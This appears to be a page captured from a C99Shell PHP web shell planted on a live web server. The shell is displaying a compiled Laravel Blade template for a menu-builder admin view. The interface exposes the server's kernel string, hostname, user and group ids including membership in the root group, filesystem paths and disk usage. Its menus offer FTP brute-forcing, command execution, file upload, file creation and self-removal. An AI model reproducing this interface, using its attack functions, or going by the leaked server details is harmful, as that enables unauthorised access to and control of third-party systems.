!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/storage/framework/views/   drwxr-xr-x
Free 27.27 GB of 117.98 GB (23.12%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     8dd92d04535769fbb5cf63f3fc7f3dd5e9f2ae0b.php (6.41 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<li id="menu-item-<?php echo e($m->id); ?>"
    class="menu-item display-list-item menu-item-depth-<?php echo e($m->depth); ?> menu-item-page menu-item-edit-inactive pending list-item" id="<?php echo e($m->id); ?>" data-val="<?php echo e($m->depth); ?>">
    <dl class="menu-item-bar" id="<?php echo e($m->id); ?>">
        <dt class="menu-item-handle">
            <span class="item-title"><i class="feather feather icon-move"></i> <span class="menu-item-title"> <span
                        id="menutitletemp_<?php echo e($m->id); ?>"><?php echo e($m->label); ?></span>
                    <span class="color-transparent d-none">|<?php echo e($m->id); ?>|</span>
                </span> <span class="is-submenu"
                    style="<?php if($m->depth==0): ?>display: none;<?php endif; ?>"><?php echo e(__('Subelement')); ?>

                </span>
            </span>
            <span class="item-controls"> <span
                    class="item-type"><?php echo e(__('Link')); ?></span> <span
                    class="item-order hide-if-js">
                    <a href="<?php echo e($currentUrl); ?>?action=move-up-menu-item&menu-item=<?php echo e($m->id); ?>&_wpnonce=8b3eb7ac44"
                        class="item-move-up"><abbr
                            title="Move Up">↑</abbr>
                    </a>
                    | <a href="<?php echo e($currentUrl); ?>?action=move-down-menu-item&menu-item=<?php echo e($m->id); ?>&_wpnonce=8b3eb7ac44"
                        class="item-move-down"><abbr
                            title="Move Down">↓</abbr>
                        </a>
                </span>
                <a class="item-edit"
                    id="edit-<?php echo e($m->id); ?>"
                    href="<?php echo e($currentUrl); ?>?edit-menu-item=<?php echo e($m->id); ?>#menu-item-settings-<?php echo e($m->id); ?>">
                </a>
            </span>
        </dt>
    </dl>
    <div class="menu-item-settings"
        id="menu-item-settings-<?php echo e($m->id); ?>">
        <input type="hidden" class="edit-menu-item-id"
            name="menuid_<?php echo e($m->id); ?>"
            value="<?php echo e($m->id); ?>" />
        <input type="hidden" class="edit-menu-depth"
            id="depthlabelmenu_<?php echo e($m->id); ?>"
            name="depth_<?php echo e($m->id); ?>"
            value="<?php echo e($m->depth); ?>" />
        <p class="description description-thin">
            <label
                for="edit-menu-item-title-<?php echo e($m->id); ?>">
                <?php echo e(__('Label')); ?>

                <br>
                <input type="text"
                    id="idlabelmenu_<?php echo e($m->id); ?>"
                    class="widefat edit-menu-item-title custom-input-field"
                    name="idlabelmenu_<?php echo e($m->id); ?>"
                    value="<?php echo e($m->label); ?>">
            </label>
        </p>
        <p class="field-css-classes description description-thin">
            <label
                for="edit-menu-item-classes-<?php echo e($m->id); ?>">
                <?php echo e(__('Class CSS (optional)')); ?>

                <br>
                <input type="text"
                    id="clases_menu_<?php echo e($m->id); ?>"
                    class="widefat edit-menu-item-classes custom-input-field"
                    name="clases_menu_<?php echo e($m->id); ?>"
                    value="<?php echo e($m->class); ?>">
            </label>
        </p>

        <p class="field-css-classes description description-thin">
            <label for="edit-menu-item-icon-<?php echo e($m->id); ?>">
                <?php echo e(__('Icon (optional)')); ?>

                <br>
                <input type="text"
                    id="clases_icon_<?php echo e($m->id); ?>"
                    class="form-control icp icp-auto iconpicker-component iconpicker-input edit-menu-item-icon custom-input-field"
                    name="icon_menu_<?php echo e($m->id); ?>" id="<?php echo e($m->id); ?>"
                    value="<?php echo e($m->icon); ?>">
            </label>
        </p>
        <p class="field-css-url description description-wide">
            <label for="edit-menu-item-url-<?php echo e($m->id); ?>">
               <?php echo e(__('URL')); ?>

                <br>
                <input type="text"
                    id="url_menu_<?php echo e($m->id); ?>"
                    class="widefat edit-menu-item-url custom-input-field"
                    id="url_menu_<?php echo e($m->id); ?>"
                    value="<?php echo e($m->link); ?>">
            </label>
        </p>
        <p class="field-css-classes description description-thin">
            <label
                for="edit-menu-item-attribute-<?php echo e($m->id); ?>">
                <?php echo e(__('Permission (optional)')); ?>

                <?php
                $jsonDecode 
= isset($m->params) && !empty($m->params) ? json_decode(json_encode($m->params),true) : '';
                
$perm '';
                
$fullArray '';
               if (
$jsonDecode) {
                   
$fullArray json_encode($m->params);
                   
$perm $jsonDecode['permission'];
               }
                
?>
                <br>
                <input type="text"
                    id="attribute_menu_<?php echo e($m->id); ?>"
                    class="widefat custom-input-field"
                    name="attribute_menu_<?php echo e($m->id); ?>"
                    value="<?php echo e($perm); ?>" readonly>
                <input type="hidden"
                    id="attribute_menu_<?php echo e($m->id); ?>"
                    class="widefat code edit-menu-item-attribute"
                    name="attribute_menu_<?php echo e($m->id); ?>"
                    value="<?php echo e($fullArray); ?>" readonly>
            </label>
        </p>
        <div
            class="menu-item-actions description-wide submitbox">
            <a onclick="deleteitem(<?php echo e($m->id); ?>)"
                class="item-delete submitdelete text-danger deletion delete-<?php echo e($m->id); ?>"
                id="<?php echo e($m->id); ?>" href="#"><?php echo e(__('Delete')); ?>

            </a>
        </div>
    </div>
    <ul class="menu-item-transport"></ul>
</li>
<?php /**PATH /home/picotech/domains/ecom1.picotech.app/public_html/Modules/MenuBuilder/Resources/views/menus.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0043 ]--